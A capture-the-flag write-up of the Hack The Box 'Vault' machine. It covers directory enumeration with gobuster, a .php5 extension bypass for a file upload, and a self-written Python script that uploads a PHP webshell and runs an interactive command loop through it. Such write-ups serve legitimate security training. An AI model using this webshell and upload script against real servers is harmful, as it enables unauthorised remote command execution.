[HTB] Vault
Foothold discovery
The attacker discovers that port 80 is open during the nmap scan:
nmap -p- -sV 10.129.87.172

The attacker browses to port 80.

The attacker discovers the /sparklays endpoint from the information the page contains.

Since access is forbidden, the attacker enumerates the endpoint to find out whether any of its sub-endpoints are accessible to an unauthenticated user.
File enumeration:
gobuster dir -w ~/SecLists/Discovery/Web-Content/raft-medium-files.txt -u http://10.129.87.172/sparklays/
Discovered endpoints:
/login.php /admin.php
Folder enumeration:
gobuster dir -w ~/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u http://10.129.87.172/sparklays/
Discovered folders:
/design
File enumeration inside found folder:
gobuster dir -w ~/SecLists/Discovery/Web-Content/raft-medium-files.txt -u http://10.129.87.172/sparklays/design
Discovered endpoints:
/design/changelogo.php
Folder enumeration inside found folder:
gobuster dir -w ~/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u http://10.129.87.172/sparklays/design
Discovered folders:
/design/uploads
The attacker goes to the discovered /design/changelogo.php endpoint.

The attacker uploads the webshell using an extension validation bypass (a file with a .php5 extension instead of .php).

The attacker opens the uploaded webshell.

Foothold flow
The attacker opens the http://<IP>/sparklays/design/changelogo.php subpage.
The attacker uploads the webshell with a .php5 extension.
The attacker opens the webshell.
Exploit written by me:
# Usage: python3 exploit.py <VICTIM_IP> <LOCAL_IP> <SHELL_LISTENER>
import random
import sys
import time

import requests

# Getting the information from the attacker
try:
    ip = sys.argv[1]
    local_ip = sys.argv[2]
    port = sys.argv[3]
except IndexError:
    print("Usage: python3 exploit.py <VICTIM_IP> <LOCAL_IP> <SHELL_LISTENER>")
    sys.exit(1)
print("Attacking the target " + ip + ".")
time.sleep(1)
# local_ip and port are only announced here; the script itself does not open a listener
print("Setting up the listener on port " + port + ".")
time.sleep(1)

##### Uploading the webshell #####
# Configure proxies to route traffic through Burp Suite
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}
# Prepare the file contents and a random name with the .php5 extension that passes the check
file_contents = "<?php system($_REQUEST['cmd']); ?>"
file_name = "shell" + str(random.randint(1000000, 1999999)) + ".php5"
# Generate a custom boundary and add it to the header
boundary = "----WebKitFormBoundaryOLFubEqWo3Dfnb5f"
headers = {
    "Content-Type": f"multipart/form-data; boundary={boundary}"
}
# Specify the url
url = "http://" + ip + "/sparklays/design/changelogo.php"
# Create the multipart request body (the final boundary must carry the closing "--")
body = (
    f"--{boundary}\r\n"
    f"Content-Disposition: form-data; name=\"file\"; filename=\"{file_name}\"\r\n"
    f"Content-Type: application/x-php\r\n\r\n"
    f"{file_contents}\r\n"
    f"--{boundary}\r\n"
    f"Content-Disposition: form-data; name=\"submit\"\r\n\r\n"
    f"upload file\r\n"
    f"--{boundary}--\r\n"
)
x = requests.post(url, data=body.encode(), proxies=proxies, headers=headers)
print("File " + file_name + " uploaded.")

##### Entering the webshell #####
shell_url = "http://" + ip + "/sparklays/design/uploads/" + file_name
while True:
    payload = input("Shell> ")
    # params= URL-encodes the command so spaces and special characters survive the request
    response = requests.get(shell_url, params={"cmd": payload}, proxies=proxies)
    print(response.text)